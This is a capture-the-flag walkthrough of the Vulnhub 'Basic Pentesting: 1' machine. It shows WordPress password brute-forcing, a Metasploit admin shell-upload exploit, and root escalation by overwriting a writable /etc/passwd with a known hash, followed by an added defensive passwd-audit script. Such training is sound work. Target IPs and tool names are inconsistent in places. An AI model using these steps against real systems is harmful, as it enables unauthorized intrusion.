This walkthrough covers the Basic Pentesting: 1 Vulnhub machine made by Josiah Pierce. It contains multiple remote vulnerabilities and multiple privilege escalation vectors. For more details or to download the machine, go here.
Steps for downloading:
Click on the given link; it will redirect you to the Vulnhub page where you can download the machine.
Click on the download mirror link to download the file.
After downloading the file, click on it and it will automatically open in VirtualBox (which I am using), or right-click on the file, choose Open with, and select VirtualBox or the virtual environment you’re using.
After setting up the requirements, click Finish.
Go to Settings, click on Network, change the setting to Host-only Adapter, and choose vboxnet0 as the name. If you can’t see vboxnet0 as an option, you should create it:
Go to Tools in VirtualBox, click on the host-only adapter option, and click Create. Now that it is created, you can go to Settings and Network and select vboxnet0.
If you’re using Kali Linux in VirtualBox, then you should use NAT Network in the Network settings. If you don’t see the name there, create one using the above step by selecting NAT Network and creating a new NAT network. You should keep the Vulnhub machine in the same NAT Network.
After changing the settings, click Start.

After downloading and setting up the machine, we need to know the IP of the target machine, which is on our network. We use ifconfig to find our own IP so we can use a ping scan to find the target IP.
I started scanning the entire network using the nmap tool, which is pre-installed in Kali Linux, and found a few machines running on this network.

After checking each IP with nmap -O, which performs OS detection, I got to know my target IP is 192.68.56.101. I used nmap to find the open ports of the target using:
nmap -A -sV -P -T4 192.168.56.101

From this we can see the following ports and services:
- port 21/tcp — FTP — (ProFTPD 1.3.3c)
- port 22/tcp — SSH — (OpenSSH 7.2p2 Ubuntu)
- port 80/tcp — HTTP — (Apache httpd 2.4.18)
We have found 3 open ports running the services FTP, SSH, and HTTP on the target. I will check the HTTP service first.

Nothing interesting on this page and not many details, so I will look for subdirectories of the target by using the dirbuster tool, which is already pre-installed on Kali Linux.
dirb http://192.168.56.101/
I got a valid URL https://192.168.56.105/secret/

After visiting the URL, I observed that all the links refer to the domain called “vtcsec”, but it seems to be down. I think this machine is meant to be the “vtcsec” host, so to see this website with full content, I’ll add “vtcsec” to my hosts file and try again.
Add the target IP address and the hostname “vtcsec” to the hosts file, which is located at /etc/hosts. Here we have used the nano text editor to add the IP and hostname.
nano /etc/hosts
cat /etc/hosts
After adding the IP and hostname and refreshing the page, this is what I got.

The link to the log in panel can then be found on the right-hand side near the bottom of this page:

The next step is to enumerate any potential users and vulnerabilities in the site by using wpscan:
wpscan --url http://192.168.56.103/secret/ --enumerate u

This revealed a number of vulnerabilities and that the default WordPress username of ‘admin’ is still in use:
wpscan --url http://192.168.56.109/secret/ -U admin -P /usr/share/wordlists/rockyou.txt

With the default username being ‘admin’, it’s worth trying to log in with the default password as ‘admin’ too… sure enough, this works.

Now that we have admin access to the WordPress site, Metasploit can be used to generate a plugin that automatically uploads a payload and gives us a shell, which provides a remote connection to the target. The module we used was wp_admin_shell_upload.
use exploit/unix/webapp/wp_admin_shell_upload

As we can see, password, rhosts and username are not set, so we should set them.

The exploit (run) should execute successfully and open a meterpreter session. Running the getuid command from this session (or id from a shell) shows we currently have access as the user www-data. Therefore, some additional work is required to obtain root access.

We get into a shell by using the shell command, then use “which python” to check whether Python is installed on the target and to find its path. Running python -c 'import pty;pty.spawn("/bin/bash")' gives a shell we can interact with, and su root -l is used to try for root access. Still, I hadn’t reached root, so I went back to the meterpreter session.
python -c 'import pty;pty.spawn("/bin/bash")'
su root -l

I checked the file permissions of /etc/passwd and found that the file had read and write permission, so now I can modify the user for root privileges. I downloaded the passwd file to the /home/vulnhub directory on my machine.
ls -l /etc/passwd
download /etc/passwd /home/vulnhub
Now the downloaded file is at /home/vulnhub/passwd, so I opened a new tab, changed into that directory, listed the files, and used cat to see the contents of the file, with grep to filter the output.
cd /home/vulnhub/
ls
cat passwd | grep root

To generate the encrypted password I used openssl with the MD5-based algorithm (-1): “openssl passwd -1 <password>”.
Then I got the encrypted password. After that, I opened the passwd file and replaced the root user’s password with the new one generated by openssl.
openssl passwd -1 hello
After modifying the passwd file, upload it back to the target machine.
It asks for a root password; I gave the password “hello”, which was generated by openssl. Yeah, we successfully get root access on the target.
upload /home/vulnhub/passwd /etc/passwd
python -c 'import pty;pty.spawn("/bin/bash")'
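The escalation above depends on two conditions: /etc/passwd was writable by an unprivileged user, and a hash placed in an entry's password field is honoured instead of the shadow entry. The audit script below is an added example, not part of the original walkthrough; its function names, the constructed sample file and the placeholder hash are assumptions, and it also flags non-root UID 0 accounts, which goes beyond the case shown here.

```sh
#!/bin/sh
# Added example (not from the original post): audit a passwd-format file.

# Report the file if group or others can write to it (for example mode 666).
check_mode() {
    find "$1" -prune \( -perm -020 -o -perm -002 \) -print 2>/dev/null |
        sed 's/^/WRITABLE /'
}

# Report entries whose password field holds something other than the shadow
# placeholder "x" or a lock marker, and non-root accounts that have UID 0.
check_entries() {
    awk -F: '
        /^#/ || NF == 0 { next }
        $2 != "x" && $2 != "*" && $2 !~ /^!/ {
            kind = ($2 == "") ? "empty" : ((index($2, "$1$") == 1) ? "md5crypt" : "other")
            printf "INLINE_PASSWORD %s %s\n", $1, kind
        }
        $3 == 0 && $1 != "root" { printf "EXTRA_UID0 %s\n", $1 }
    ' "$1"
}

# Print all findings; return 0 when the file is clean, 1 otherwise.
audit_passwd() {
    findings=$(check_mode "$1"; check_entries "$1")
    if [ -z "$findings" ]; then return 0; fi
    printf '%s\n' "$findings"
    return 1
}

# Constructed sample: a world-writable copy with a hash in root's entry.
# The hash text is a labelled placeholder, not real openssl output.
sample=$(mktemp)
cat > "$sample" <<'EOF'
root:$1$constsalt$PLACEHOLDERnotARealHash:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
EOF
chmod 666 "$sample"
audit_passwd "$sample" || true
rm -f "$sample"
```

On a real host, run `audit_passwd /etc/passwd`; a clean system prints nothing and returns 0.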

That’s it! Thanks for reading. Stay tuned for similar walkthroughs and much more coming up in the near future!
Disclaimer:
We believe that these practices will educate everyone about ethical hacking, and we do not promote, encourage, support, or excite any illegal activity or hacking.
We will not be responsible for your illegal actions.
Akash L
Trainer & Security Researcher